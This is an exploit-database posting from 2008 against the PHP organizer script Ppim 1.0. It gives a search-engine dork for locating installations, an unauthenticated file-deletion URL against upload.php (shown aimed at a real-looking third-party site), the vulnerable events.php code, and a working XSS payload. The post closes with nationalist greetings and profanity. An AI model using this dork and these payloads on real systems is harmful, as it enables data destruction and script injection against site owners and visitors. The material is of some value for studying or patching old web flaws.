[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ppim <= 1.0 (Arbitrary File Delete/XSS) Multiple Vulnerabilities

Author
BeyazKurt
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3515
Category
web applications
Date add
09-08-2008
Platform
unsorted
================================================================
Ppim <= 1.0 (Arbitrary File Delete/XSS) Multiple Vulnerabilities
================================================================



##########################################################
#Author : BeyazKurt
#
#Script : Ppim v1.0 [Bu ne bicim script adidir amk :D ]
#Download : http://scripts.ringsworld.com/organizers/ppim.zip
#
# D0rk :  inurl:events.php?listallevents
#
# File Delete Vulnerability: upload.php
#
# Example:http://creawebs.com.mx/sistema/upload.php?mode=delfile&file=Creando Wiki.pptx
# Exploit:http://SITE.COM/upload.php?mode=delfile&file=FileName
#
# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
#
# XSS Vulnerability: events.php
#
#[CODE]
#  <?php
#  if (isset($_GET['date']))
#  {
#    $date_id = $_GET['date'];
#  print "<a href=\"events.php?mode=new&date=$date_id\">New Event</a><br / >";
#  }
#  ?>
#[/CODE]
#
#Exploit :
# events.php?mode=new&date=XSS CODE
# events.php?mode=new&date="><script>alert('XSS')</script>
# -------------------------------
#
#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
#  pigs for dedication : :  WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
#                      Proud 2 Be ALBANIAN
#
# MTK : 0 - 5 : FenerBahce (H)
#
# Not : Fuck off pala! aq lameri.
# Thnx : All Muslims Albanian & Turkish Coder.. And CrazyShark f0r translate.
#######################################################



#  0day.today [2024-12-24]  #